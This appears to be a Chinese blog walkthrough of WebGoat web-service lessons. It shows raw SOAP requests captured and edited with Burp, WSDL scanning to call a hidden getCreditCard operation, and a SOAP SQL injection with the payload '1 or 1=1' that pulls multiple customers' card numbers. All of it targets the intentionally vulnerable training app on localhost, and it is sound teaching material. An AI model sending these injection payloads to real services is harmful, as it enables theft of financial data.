WebGoat Day3 Web Services

發表於 2016-07-14   |   分類於 信息安全   |  

Create a SOAP Request

1
2
http://localhost/WebGoat/services/SoapRequest
http://localhost/WebGoat/services/SoapRequest?WSDL

然后接着要发送一个SOAP的请求,点击按钮“Press to generate an HTTP request”,然后用burp进行拦截,拦截之后修改请求符合SOAP标准,如下:

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
POST https://localhost:8443/WebGoat/services/SoapRequest HTTP/1.1
Host: localhost:8443
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; rv:45.0) Gecko/20100101 Firefox/45.0
Accept: textml,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
Accept-Language: zh-CN,zh;q=0.8,en-US;q=0.5,en;q=0.3
Accept-Encoding: gzip, deflate, br
Referer: https://localhost:8443/WebGoat/attack?Screen=32&menu=1800
Cookie: JSESSIONID=B0E2BCDE68B32C2894064DF30A545EAA
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
Connection: close
Content-Type: text/xml
SOAPAction:
Content-Length: 445
<?xml version="1.0" encoding="UTF-8"?>
<SOAP-ENV:Envelope xmlns:SOAP-ENV="http://schemas.xmlsoap.org/soap/envelope/"
xmlns:xsd="http://www.w3.org/2001/XMLSchema"
xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance">
<SOAP-ENV:Body>
<ns1:getFirstName SOAP-ENV:encodingStyle="http://schemas.xmlsoap.org/soap/encoding/"
xmlns:ns1="http://lessons">
<id xsi:type="xsd:int">101</id>
</ns1:getFirstName>
</SOAP-ENV:Body>
</SOAP-ENV:Envelope>

WSDL Scanning

这部分课程是要我们用到所有WSDL中定义的API操作,并且有返回值。我们知道WSDL中实际上有四种操作,而这里只列出了三种,我们可以查看WSDL文档后,将其修改为我们需要的操作。如图所示,把请求更改为这样 filed=getCreditCard

Web Service SQL Injection

要求我们查看WSDL文件,并尝试获取多个客户的信用卡帐号。
这一节与第一节一样,需要我们自己构造一个SOAP请求,构造如下请求发送

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
POST http://127.0.0.1:8080/WebGoat/services/WsSqlInjection HTTP/1.0
Accept: application/soap+xml, application/dime, multipart/related, text/*
Host: 127.0.0.1:8080
Content-Type: text/xml; charset=utf-8
SOAPAction: ""
Content-length: 584
Authorization: Basic Z3Vlc3Q6Z3Vlc3Q=
<?xml version='1.0' encoding='UTF-8'?>
<wsns0:Envelope
  xmlns:wsns1='http://www.w3.org/2001/XMLSchema-instance'
  xmlns:xsd='http://www.w3.org/2001/XMLSchema'
  xmlns:wsns0='http://schemas.xmlsoap.org/soap/envelope/'
>
  <wsns0:Body
    wsns0:encodingStyle='http://schemas.xmlsoap.org/soap/encoding/'
  >
    <wsns2:getCreditCard
          xmlns:wsns2='http://lessons.webgoat.owasp.org'
    >
      <id
        xsi:type='xsd:string'
              xmlns:xsi='http://www.w3.org/2001/XMLSchema-instance'
      >1 or 1=1</id>
    <ns2:getCreditCard>
  <ns0:Body>
<ns0:Envelope>

注意 id 为`1 or 1=1

Web Service SAX Injection

有些Web界面在后台使用的是Web Services。而Web Services通过SOAP请求进行通信。该节课程需要我们修改除了用户101以外的另一个用户的密码。
拦截后,把请求修改。

#渗透测试
从利用角度详解手工SQL注入
WebGoat Day3 Session Management Flaws